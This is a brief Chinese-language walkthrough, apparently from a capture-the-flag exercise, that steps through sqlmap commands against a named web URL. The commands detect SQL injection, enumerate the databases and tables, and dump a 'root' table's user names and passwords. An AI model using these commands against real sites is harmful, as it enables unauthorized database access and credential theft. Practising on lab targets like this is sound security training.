(1)输入python sqlmap.py,
(2)找到可能包含漏洞的文件地址,例如python sqlmap.py -u "http://caichuanqi.cn:8866/ry.php?ry_id=201",
由此看到包含三种漏洞。
(3)输入python sqlmap.py -u "http://caichuanqi.cn:8866/ry.php?ry_id=201" --dbs,找到符合要求的数据库,图为“jnng”
(4)输入python sqlmap.py -u "http://caichuanqi.cn:8866/ry.php?ry_id=201" -D jnng --tables,查看数据库jnng中的所有表信息,找到可能包含密码或flag的列
(5)输入python sqlmap.py -u "http://caichuanqi.cn:8866/ry.php?ry_id=201" -D jnng -T root --columns,爆破列
(6)输入python sqlmap.py -u "http://caichuanqi.cn:8866/ry.php?ry_id=201" -D jnng -T root -C root_id,root_name,root_pass --dump,爆破列的相关信息